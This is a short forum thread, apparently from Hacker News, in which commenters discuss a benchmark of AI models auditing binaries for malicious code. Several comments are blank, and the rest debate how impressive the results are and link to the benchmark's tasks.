(no title)
7777332215 | 7 days ago
This is detecting the pattern of an anomaly in language associated with malicious activity, which is not impressive for an LLM.
7777332215 | 7 days ago
This is detecting the pattern of an anomaly in language associated with malicious activity, which is not impressive for an LLM.
stared|7 days ago
The tasks here are entry level. So we are impressed that some AI models are able to detect some patterns, while looking just at binary code. We didn't take it for granted.
For example, only a few models understand Ghidra and Radare2 tooling (Opus 4.5 and 4.6, Gemini 3 Pro, GLM 5) https://quesma.com/benchmarks/binaryaudit/#models-tooling
We consider it a starting point for AI agents being able to work with binaries. Other people discovered the same - vide https://x.com/ccccjjjjeeee/status/2021160492039811300 and https://news.ycombinator.com/item?id=46846101.
There is a long way ahead from "OMG, AI can do that!" to an end-to-end solution.
botusaurus|7 days ago
akiselev|7 days ago
eli|7 days ago
achille|7 days ago
see:
- https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dns...
- https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dro...
comex|7 days ago
The second one is more impressive. I'd like to see the reasoning trace.
hereme888|7 days ago
halflife|7 days ago
bethekidyouwant|7 days ago
Avamander|7 days ago
If anything, complex logic is what'll defeat an LLM. But a good model will also highlight such logic being intractable.
Retr0id|7 days ago